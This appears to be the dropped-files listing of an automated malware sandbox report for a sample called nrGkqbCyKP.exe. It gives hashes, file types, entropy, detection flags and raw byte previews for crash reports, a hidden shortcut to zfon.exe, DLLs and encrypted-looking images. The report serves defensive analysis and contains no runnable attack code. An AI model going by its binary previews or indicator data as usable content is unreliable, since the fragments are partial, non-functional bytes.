                                                                                                                                                                          Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.0.6.4.<./.P.i.
                                                                                                                                                                          Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):4613
                                                                                                                                                                          Entropy (8bit):4.424559994705384
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:48:cvIwWl8zsEtJg771I92kEWpW8VY1Ym8M4JB0KtFjyq85zVK0ylXyed:uIjfEHI7Xkd7VZJ2QQuVyed
                                                                                                                                                                          MD5:1B7DBE11FB68F6F5F375DC6CD7DCC4BF
                                                                                                                                                                          SHA1:05CF62A006580C53CD03FFD23F7B062B8818D5EB
                                                                                                                                                                          SHA-256:8AABFA0356602FA70B49D1990CD2A214FAEB1A43EC9E5427A24831134CF30D62
                                                                                                                                                                          SHA-512:A07A46322F295022C3A6E4B02F403486CF2B9533725DD99ECDF8EF28EF9CFAEFA77EDF03A8AC7427E67C303C390ED650E03D3575554BF2C962328C841B1E3F14
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="636669" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                                                                                                                          Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                          File Type:Mini DuMP crash report, 15 streams, Wed Dec 18 12:06:50 2024, 0x1205a4 type
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):35456
                                                                                                                                                                          Entropy (8bit):2.32861195194536
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:96:5h8eJJm3vf/GepoNNoIdLOTKxYXA9yXi7P65uhE56+vMFisYTBsPa7x7OcP4mWIN:4eTEQdLXPyXOyggvUFiXjyrQ3HAH6
                                                                                                                                                                          MD5:75303E3040451C0E8D6158CAA5967BD7
                                                                                                                                                                          SHA1:BA5F6FF3E7384739053683802B2691D5B4C2731E
                                                                                                                                                                          SHA-256:AF781F882A494558B2F3488ABD6C9F624AAD6F1D8CB7F6D7716ECC1E979C432F
                                                                                                                                                                          SHA-512:0EE88B7810AF6C05B21CA77C72439CCECC1EDBE6344498D958F1537E2EA6A8F1BF24F29019FA2D59CC480EE668DADB845A7C7BC58F95293915DC47AF2C54F760
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:MDMP..a..... ........bg............4...............H.......<...`.......T....$..........`.......8...........T...........P...0.......................................................................................................eJ...... .......Lw......................T............bg.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                          Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                          File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):6488
                                                                                                                                                                          Entropy (8bit):3.7170628112048307
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:96:RSIU6o7wVetb5U9Yte9uwBR5aMOUY89bPshDXf3R9Km:R6l7wVeJ5U9YtexpBY89bkhrfBsm
                                                                                                                                                                          MD5:90579639809DFDEC7A2F0FB6A156847C
                                                                                                                                                                          SHA1:86F316F0BCE1E73304B79335F0C32D6A3D446A9D
                                                                                                                                                                          SHA-256:1AEC1F0457E4535F061EBF03528C13BFA877416BAD23B65B40C77F31EE38B02C
                                                                                                                                                                          SHA-512:60B20CD6A9AB9ACD08BB8B8BA593F540012D85BC74EED676CEF147FD0BF49A76F3A0C0EE62E60D051CD53324573844373543BA44F137B06119E4D6BD719FD9B9
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.0.6.4.<./.P.i.
                                                                                                                                                                          Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):4613
                                                                                                                                                                          Entropy (8bit):4.424146778069011
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:48:cvIwWl8zsEtJg771I92kEWpW8VYxd25Ym8M4JB0KtFOsPyq85zVK0ylXyed:uIjfEHI7Xkd7Vyd7J2qQuVyed
                                                                                                                                                                          MD5:6AB8C2034DFC40FFB67CFBAAAB224E1A
                                                                                                                                                                          SHA1:6317C8BF556188EF896BCA42DE4A3DEFA3A63D51
                                                                                                                                                                          SHA-256:0A5CDD0102B56FCC016CECE9DE7FD2CA1F4F225C70A054E32951C210C6432BD4
                                                                                                                                                                          SHA-512:359628F472C9283EFA4952DC802321125D27E2855EA7997262CE9A386ECC2B1723BA992D45F32F48B978FE39649AB86ED21A73CC9C1B12A5ABD66382902CA4A5
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="636669" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                                                                                                                          Process:C:\Windows\explorer.exe
                                                                                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Archive, ctime=Wed Dec 18 11:06:04 2024, mtime=Wed Dec 18 11:06:46 2024, atime=Wed Dec 18 11:06:04 2024, length=2659840, window=hide
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):1052
                                                                                                                                                                          Entropy (8bit):5.042112590600274
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:24:8m9HDNxZ4gXY/sg6BNAy46Y/sR6FcMy7Myzqygm:8m9H5xZ4gWd95l/B+Mpyg
                                                                                                                                                                          MD5:521DB7C6D2CEB98A32E96F93CBDCD214
                                                                                                                                                                          SHA1:E90D45BA44500B394BBD5E7991497574CA257303
                                                                                                                                                                          SHA-256:C72576F60553D3E16E97B1F2BB2937653A00BBD7124E27AC27E915EFDB5ABBEF
                                                                                                                                                                          SHA-512:7B5A0492718194509AAE927C09BA3F64D911DC7C91918CF3D6250829F5B296605F9FC1683A04EF5FDE8B4D11CAE2CFCAA92962B87B3BFE4E6E552100535A2301
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:L..................F.... ...d~T6EQ....+OEQ..d~T6EQ....(.....................T.:..DG..Yr?.D..U..k0.&...&.......y.Yd....v.1EQ.....QEQ......t...CFSF..1......Y.`..6B703E~1....t.Y^...H.g.3..(.....gVA.G..k...z......Y.`.Y.`...........................]+.6.b.7.0.3.e.4.9.-.a.3.2.8.-.4.b.2.a.-.8.c.9.e.-.0.1.8.2.c.b.f.9.1.c.5.7...D.Z.2...(..Y.` .zfon.exe..B......Y.`.Y.`....;......................L..z.f.o.n...e.x.e.......l...............-.......k....................C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exe..@.....\.....\.U.s.e.r.s.\.h.u.b.e.r.t.\.6.b.7.0.3.e.4.9.-.a.3.2.8.-.4.b.2.a.-.8.c.9.e.-.0.1.8.2.c.b.f.9.1.c.5.7.\.z.f.o.n...e.x.e...C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.y.L.n.k.............:...........|....I.J.H..K..:...`.......X.......user-pc........hT..CrF.f4... ..X..8....,...E...hT..CrF.f4... ..X..8....,...E..............1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.2.2.4.6.1.2.2.6.5.8.-.3.6.9.3.4.0.5.1.1.7.-.2.4.7.6.7.5.6.6.3.4.-.1.0.0.3.........9...1SPS..mD.
                                                                                                                                                                          Process:C:\Windows\hh.exe
                                                                                                                                                                          File Type:data
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):30
                                                                                                                                                                          Entropy (8bit):2.6616157143988106
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:3:tblM6lEjln:tbhEZn
                                                                                                                                                                          MD5:AE50B29A0B8DCC411F24F1863B0EAFDE
                                                                                                                                                                          SHA1:D415A55627B1ADED8E4B2CBBA402F816B0461155
                                                                                                                                                                          SHA-256:6B4BBBCE480FBC50D39A8EC4B72CDB7D781B151921E063DD899FD9B736ADCF68
                                                                                                                                                                          SHA-512:D9A9BA42D99BE32D26667060BE1D523DCD20EAFA187A67F7919002CC6DA349FD058053C9C6F721D6FDB730EA02FBAA3013E51C0C653368BD6B3F57A4C0FCABA8
                                                                                                                                                                          Malicious:true
                                                                                                                                                                          Preview:C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.
                                                                                                                                                                          Process:C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exe
                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):21
                                                                                                                                                                          Entropy (8bit):3.368042422572716
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:3:hMCEpFQkv:hur9
                                                                                                                                                                          MD5:2D282102FA671256327D4767EC23BC6B
                                                                                                                                                                          SHA1:E6C4FBD4FE7607F3E6EBF68B2EA4EF694DA7B4FE
                                                                                                                                                                          SHA-256:649B8B471E7D7BC175EEC758A7006AC693C434C8297C07DB15286788C837154A
                                                                                                                                                                          SHA-512:BF9BAC8036EA00445C04E3630148FDEC15AA91E20B753349D9771F4E25A4F68C82F9BD52F0A72CEAFF5415A673DFEBC91F365F8114009386C001F0D56C7015DE
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:This is a test file..
                                                                                                                                                                          Process:C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exe
                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):21
                                                                                                                                                                          Entropy (8bit):3.368042422572716
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:3:hMCEpFQkv:hur9
                                                                                                                                                                          MD5:2D282102FA671256327D4767EC23BC6B
                                                                                                                                                                          SHA1:E6C4FBD4FE7607F3E6EBF68B2EA4EF694DA7B4FE
                                                                                                                                                                          SHA-256:649B8B471E7D7BC175EEC758A7006AC693C434C8297C07DB15286788C837154A
                                                                                                                                                                          SHA-512:BF9BAC8036EA00445C04E3630148FDEC15AA91E20B753349D9771F4E25A4F68C82F9BD52F0A72CEAFF5415A673DFEBC91F365F8114009386C001F0D56C7015DE
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:This is a test file..
                                                                                                                                                                          Process:C:\Users\user\Desktop\nrGkqbCyKP.exe
                                                                                                                                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):627992
                                                                                                                                                                          Entropy (8bit):6.360523442335369
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:12288:dO93oUW7jh6DN0RUhsduQjqDZ6X/t5mTOKGmJ7DseBiltBMQEKZm+jWodEEVoFt:s3oUW7jh6DN0RUhsduQjqDZ6X/t5mTOo
                                                                                                                                                                          MD5:C1B066F9E3E2F3A6785161A8C7E0346A
                                                                                                                                                                          SHA1:8B3B943E79C40BC81FDAC1E038A276D034BBE812
                                                                                                                                                                          SHA-256:99E3E25CDA404283FBD96B25B7683A8D213E7954674ADEFA2279123A8D0701FD
                                                                                                                                                                          SHA-512:36F9E6C86AFBD80375295238B67E4F472EB86FCB84A590D8DBA928D4E7A502D4F903971827FDC331353E5B3D06616664450759432FDC8D304A56E7DACB84B728
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Antivirus:
                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                          Joe Sandbox View:
                                                                                                                                                                          • Filename: sxVHUOSqVC.exe, Detection: malicious, Browse
                                                                                                                                                                          • Filename: R0SkdJNujW.exe, Detection: malicious, Browse
                                                                                                                                                                          • Filename: drivers.exe, Detection: malicious, Browse
                                                                                                                                                                          • Filename: GameBoxMini.exe, Detection: malicious, Browse
                                                                                                                                                                          • Filename: drivers.exe, Detection: malicious, Browse
                                                                                                                                                                          • Filename: RQoBY766F5.exe, Detection: malicious, Browse
                                                                                                                                                                          • Filename: RQoBY766F5.exe, Detection: malicious, Browse
                                                                                                                                                                          • Filename: , Detection: malicious, Browse
                                                                                                                                                                          • Filename: RemotePCViewer.exe, Detection: malicious, Browse
                                                                                                                                                                          • Filename: 1Gqt1JqOZN.exe, Detection: malicious, Browse
                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......`..r$..!$..!$..!.O.!&..!-.|!2..!v.. '..!$..!...!v.. '..!v.. o..!v.. j..!v.. %..!v..!%..!v.. %..!Rich$..!................PE..d.....0].........." .........`...... ...............................................T.....`A............................................h....................0..t@...T...A..............8............................................ ..........@....................text...<........................... ..`.rdata..<.... ......................@..@.data....;..........................@....pdata..t@...0...B..................@..@.didat..h............B..............@....rsrc................D..............@..@.reloc...............H..............@..B................................................................................................................................................................................................................
                                                                                                                                                                          Process:C:\Users\user\Desktop\nrGkqbCyKP.exe
                                                                                                                                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):119376
                                                                                                                                                                          Entropy (8bit):6.605105564769165
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:1536:BqvQFDdwFBHKaPX8YKpWgeQqbekRG7MP4ddbHecbWcmpCGtodMzDZ92zfa:BqvQFDUXqWn7CkRG7jecbWb9toaera
                                                                                                                                                                          MD5:E9B690FBE5C4B96871214379659DD928
                                                                                                                                                                          SHA1:C199A4BEAC341ABC218257080B741ADA0FADECAF
                                                                                                                                                                          SHA-256:A06C9EA4F815DAC75D2C99684D433FBFC782010FAE887837A03F085A29A217E8
                                                                                                                                                                          SHA-512:00CF9B22AF6EBBC20D1B9C22FC4261394B7D98CCAD4823ABC5CA6FDAC537B43A00DB5B3829C304A85738BE5107927C0761C8276D6CB7F80E90F0A2C991DBCD8C
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Antivirus:
                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                          Joe Sandbox View:
                                                                                                                                                                          • Filename: sxVHUOSqVC.exe, Detection: malicious, Browse
                                                                                                                                                                          • Filename: R0SkdJNujW.exe, Detection: malicious, Browse
                                                                                                                                                                          • Filename: drivers.exe, Detection: malicious, Browse
                                                                                                                                                                          • Filename: GameBoxMini.exe, Detection: malicious, Browse
                                                                                                                                                                          • Filename: drivers.exe, Detection: malicious, Browse
                                                                                                                                                                          • Filename: net.zip, Detection: malicious, Browse
                                                                                                                                                                          • Filename: SecuriteInfo.com.FileRepMalware.26149.11274.exe, Detection: malicious, Browse
                                                                                                                                                                          • Filename: SecuriteInfo.com.FileRepMalware.26149.11274.exe, Detection: malicious, Browse
                                                                                                                                                                          • Filename: SecuriteInfo.com.FileRepMalware.26149.11274.exe, Detection: malicious, Browse
                                                                                                                                                                          • Filename: SecuriteInfo.com.FileRepMalware.26149.11274.exe, Detection: malicious, Browse
                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........N.../c../c../c._]b./c..W.../c../b./c../c../c...`./c...g./c...f./c...c./c....../c...a./c.Rich./c.........................PE..d.... ............" ...&. ...d.......................................................:....`A.........................................e..4...4m..........................PP...........N..p............................L..@............0...............................text...V........................... ..`fothk........ ...................... ..`.rdata..\C...0...D...$..............@..@.data...p............h..............@....pdata...............l..............@..@_RDATA...............x..............@..@.rsrc................z..............@..@.reloc...............~..............@..B................................................................................................................................................................
                                                                                                                                                                          Process:C:\Users\user\Desktop\nrGkqbCyKP.exe
                                                                                                                                                                          File Type:PNG image data, 605 x 390, 8-bit/color RGB, non-interlaced
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):660160
                                                                                                                                                                          Entropy (8bit):7.996422927525233
                                                                                                                                                                          Encrypted:true
                                                                                                                                                                          SSDEEP:12288:tiTfEJiX3KaRppbIa6QJKuI+tdwh0b+ngpZfPd78cnFICTQLgMGatwJtiy9:WX3Ke5xI+ttqngpRD+CipGatwx
                                                                                                                                                                          MD5:0CA6A22E9FEADB18C76712B5B0256B96
                                                                                                                                                                          SHA1:46A678DCB5FC076816165DA255AB237D027975FB
                                                                                                                                                                          SHA-256:8A8D9DD1DDDCA28A9063E828B1F8CE35D6DDC68692C988DA79BA957FDBC0035A
                                                                                                                                                                          SHA-512:19B7754408DC79610B4447F6B7C55F9863378ECFD60A7496366DAA5CA4032DD0B2A0FD656D8112069D5385C45B57617C8B7B288BCDBCEB85BAB01FF44FB7D498
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:.PNG........IHDR...]................pHYs...%...%.IR$.....tEXtSoftware.Snipaste]..... .IDATx..W.$;.%..={...b.2.p.....+.euO1_.07..Ah*........#D "b&"&.G"".c.1@...>33.~%".j&....{eK../.ML..9...t..5.3.Hd... ..[.....i..T..]... &f.....L..cP.OG...%.......>....D..g"..W.gV.. ..""..1+.^.....{T.......J...>.!.....yq.N../..f.6../...4.EL{0.@7L"F.(ha.y.A..1V....B.L.V..g.D..vs..<t ..'..~`.q!.*.p!$.zD$d.IB...Y.~..B......>...w......9...`..<..EA.....0./....`....BoI..^p!.h....h.<..*...Ls%..g.\.C.i~,.|Uh.VTq.1F.7..{-.6..-.....I....Z.*..%)C.\l\.yoX.KT.....?..k.......9....r..>l.......Z5?..+.\.P1.....!...L6....'.( ....33.$$.......h..1Q.r.e4...IhFI.Z........"d .^.0q.KQ..j..W........#....W..D..0K..h...K.........#MqW3]...\q{..*....R.m...H..."..a6O...pNs._N.......I1.@Nc.}.W0}.... b83.2.b...c.......jod5<F.o@5..Wc.4.Ekr.e.?dXb. .H=..PFU,..(..4....D.uk!lp.P.....(E}.r.......<.9.?.}.....i(.....t.&x.`_e..}./.i.SZ.....;..md'X._...Q..........j..:.G...../6...H..DJ......k..`.a.9..
                                                                                                                                                                          Process:C:\Users\user\Desktop\nrGkqbCyKP.exe
                                                                                                                                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):244397152
                                                                                                                                                                          Entropy (8bit):0.005451982949466598
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:1536:8jPqt44MQyK3g/QsenSOOWdlzLfNVMaR7HxDGc9s7zUx:8jPk44M3K3gLKnLfNVMaRJGcu
                                                                                                                                                                          MD5:EC97E838E8FDA95207C2E2D8BCCCA820
                                                                                                                                                                          SHA1:B4510AA0F4A24125E2EC9C95FD3C144EFD10B8D0
                                                                                                                                                                          SHA-256:0627D4A54BD14AEDA0C116723CAB0FBAB59A06096CB250EEA320EEC984A36592
                                                                                                                                                                          SHA-512:0301EA4FAFB2060073C3008D25B682437FFF29250A46AA85687A580851787D5924AF824BF0A066E47B9F5370006EE63CAAB2D4F9CB68FAB7E11CC34EB28DFF57
                                                                                                                                                                          Malicious:true
                                                                                                                                                                          Antivirus:
                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 24%
                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........lo..............u......x......x......x......u......u......u.............x......u.......x.......x.......x.......x......Rich....................PE..d....Tg.........." .....|...h......\{.......................................0............`.............................................."..p..........................`R... ..T.......8...............................8............................................text...z{.......|.................. ..`.rdata...Q.......R..................@..@.data...H...........................@....pdata.............................@..@.rsrc..............................@..@.reloc..T.... ......................@..B........................................................................................................................................................................................................................
                                                                                                                                                                          Process:C:\Users\user\Desktop\nrGkqbCyKP.exe
                                                                                                                                                                          File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 244397152
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):271126
                                                                                                                                                                          Entropy (8bit):1.6290509027122977
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:
                                                                                                                                                                          MD5:D7B50924AB14320B946526EB3DB6A08F
                                                                                                                                                                          SHA1:C114B1C3106C533E40470BE319094810670FE3BF
                                                                                                                                                                          SHA-256:42719113D64459DBF01EADA16DE0723BD0EEF888E25A76C69306F122B2C66BE1
                                                                                                                                                                          SHA-512:C39E877CE350977826793E6298FD93013846EE934CBCE639F16DCFBC91188AFF89C7F6C87C90A2A0B2A050627387C80C6354480F8E5655234EBBD7A8FD106449
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:............|T....f...%...P;j... ...H....!HD4...&.q...A..8Fc..]\..Z[[j}...D%(*...T.....wl...~.9..%...{.....y.{....Y...%="C..I*..b.Px....".[.e...<{.fG..T7.....y....P.........H....]6......8b.....[.....x.T..|.=t.....+..|.uy....M..|S....?I..K{..>%....&]G..:.....5C>/hih.p..VU.D......z...a........zK/..\i..!..S.A.y.E7d.L&2D..td^R.....b.B....u.yC.^....o...[=.u...!..#..!J.Rf.l.i..^...'.}.a..6..i.L....nb..>\O..<..8.I.....5..L...n.t}!.^...(.Hi.C........`...<....o...k...j.amoo.......l....vU.dy;./.F+...}...hYA.7.g..g>t>Q.m.......G......G%:....}....\......?..ZWp3.l/+p.irm..##..=tI...l.&....d..1....J...^^C..{...z...........l.d......."Y."I7.I.p.r.}m.....#.%XO..#D...{#.....I....8....... .%.d|/U.....u.......Bo.OE...B.s...P..;y......m>z.*......~eA],.C.j.E`.]=Fm..(.vW.x...eFk.Nvx.-...}.X."...C(.3u.....(+.G.9....0...4.....&C.Y.....+en..z....upn..hv...Rf.G..*.I..F..V%.V.q....A.-~A...+....<1......j/W.RN.o............[...Lr...n...g..{......|}N..8.....
                                                                                                                                                                          Process:C:\Users\user\Desktop\nrGkqbCyKP.exe
                                                                                                                                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):49744
                                                                                                                                                                          Entropy (8bit):6.675573056871668
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:
                                                                                                                                                                          MD5:EB49C1D33B41EB49DFED58AAFA9B9A8F
                                                                                                                                                                          SHA1:61786EB9F3F996D85A5F5EEA4C555093DD0DAAB6
                                                                                                                                                                          SHA-256:6D3A6CDE6FC4D3C79AABF785C04D2736A3E2FD9B0366C9B741F054A13ECD939E
                                                                                                                                                                          SHA-512:D15905A3D7203B00181609F47CE6E4B9591A629F2BF26FF33BF964F320371E06D535912FDA13987610B76A85C65C659ADAC62F6B3176DBCA91A01374178CD5C6
                                                                                                                                                                          Malicious:true
                                                                                                                                                                          Antivirus:
                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......9@.W}!..}!..}!...S...!..{....!..tYJ.v!..}!..N!..{...x!..{...z!..{...f!..{...|!..{.&.|!..{...|!..Rich}!..................PE..d.....=..........." ...&.<...8.......B....................................................`A........................................Pm.......m..x....................r..PP......D....c..p...........................`b..@............P..`............................text...p:.......<.................. ..`.rdata...#...P...$...@..............@..@.data................d..............@....pdata...............f..............@..@.rsrc................l..............@..@.reloc..D............p..............@..B........................................................................................................................................................................................................................................................
                                                                                                                                                                          Process:C:\Users\user\Desktop\nrGkqbCyKP.exe
                                                                                                                                                                          File Type:PNG image data, 605 x 390, 8-bit/color RGB, non-interlaced
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):376421
                                                                                                                                                                          Entropy (8bit):7.989777916441178
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:
                                                                                                                                                                          MD5:1E17E3F8B9917CE02CDB53F289DB96C9
                                                                                                                                                                          SHA1:0B40A61EF4B5D1DBFD437896D1881A0EE5A457D9
                                                                                                                                                                          SHA-256:D98A28F66F6B168164DB2C62AC1AD62F0316D52BBBEB7F8787300E429319E6B1
                                                                                                                                                                          SHA-512:2DD8AC7914289056413927208B7451F5212DB598D8F6F91190CB7844BE1A937C239DAA9F8E9B91869D724527F20CAC04BD414AD28C0155F1B9D6200B91EDC881
                                                                                                                                                                          Malicious:false
